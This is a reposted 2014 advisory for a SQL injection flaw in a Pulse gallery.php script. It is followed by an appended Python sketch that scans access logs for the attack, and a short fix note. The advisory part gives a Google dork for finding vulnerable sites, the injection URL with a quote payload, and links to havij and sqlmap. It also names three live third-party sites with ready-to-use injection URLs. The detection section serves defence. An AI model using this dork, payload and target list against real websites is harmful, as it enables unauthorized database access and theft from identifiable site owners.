Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Pulse gallery SQLi Vulnerability

###################################################################################################
# Author: kj-fido
# Date: 5/14/2014
# Vendor Homepage: http://pulse.bg/
# Vulnerability Type: SQL Injection Vulnerability
# Affected File: gallery.php
# Category: webapps
# Google dork: intext:"PULSE Design" /gallery.php?pageNum_Gallery_All
# Tested on: Windows, Linux
###################################################################################################

# Exploit
www.site.com/gallery.php?pageNum_Gallery_All=[ ]&totalRows_Gallery_All=[ ]&l=de&cat=[ ]'
-
You have an error in your SQL syntax .....
-
# download havij or sqlmap
http://itsecteam.com/en/projects/project1_page2.htm
http://sqlmap.org/
-
# Live Sites:
http://www.saveraptors.org/gallery.php?l=En&type=image&pageNum_Gallery_All=0&totalRows_Gallery_All=4&cat=4&subcat=0&id=37%27
http://www.tenti.eu/gallery.php?pageNum_Gallery_All=4&l=en&cat=2%27
http://www.artelvil.com/en/gallery.php?pageNum_Gallery_All=0&totalRows_Gallery_All=12&cat=3&id=71%27
-
# Greetz: To all my friends & all muslims .../
# Facebook page: https://www.facebook.com/kjfido.gov
# Twitter: @kjfido
###################################################################################################
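
Detection sketch for the pattern reported above, added here as an example and not part of the original advisory: it flags access-log requests to gallery.php whose numeric parameters carry non-digit values after percent-decoding (such as the trailing %27). Assumptions: the listed parameters are integer-only (as they are in the advisory's URLs), the log uses the common combined format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# gallery.php parameters that hold only integers in the advisory's URLs (assumption).
NUMERIC_PARAMS = {"pageNum_Gallery_All", "totalRows_Gallery_All", "cat", "subcat", "id"}

# Request line inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_params(log_line):
    """Return [(param, decoded_value), ...] for non-integer values sent to gallery.php."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/gallery.php"):
        return []
    # parse_qsl percent-decodes once, so %27 is compared as a literal quote and
    # a double-encoded %2527 still fails the integer check as "%27".
    pairs = parse_qsl(url.query)
    return [(k, v) for k, v in pairs if k in NUMERIC_PARAMS and not INTEGER_RE.fullmatch(v)]


def scan(lines):
    """Return {line_number: findings} for every line with at least one finding."""
    hits = {}
    for number, line in enumerate(lines, 1):
        findings = suspicious_params(line)
        if findings:
            hits[number] = findings
    return hits


# Constructed sample entries (documentation IP range, invented timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2014:10:01:02 +0000] "GET /gallery.php?pageNum_Gallery_All=0&totalRows_Gallery_All=4&l=en&cat=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [14/May/2014:10:03:40 +0000] "GET /gallery.php?pageNum_Gallery_All=4&l=en&cat=2%27 HTTP/1.1" 500 312',
    '192.0.2.77 - - [14/May/2014:10:03:41 +0000] "GET /en/gallery.php?pageNum_Gallery_All=0&cat=3&id=71%2527 HTTP/1.1" 200 4980',
    '192.0.2.10 - - [14/May/2014:10:04:00 +0000] "GET /news.php?id=5%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(f"line {number}: {findings}")
```

The same integer check, applied server-side before the values reach the query, is the corresponding fix: reject or cast every parameter in the set and bind it through a prepared statement.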



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.
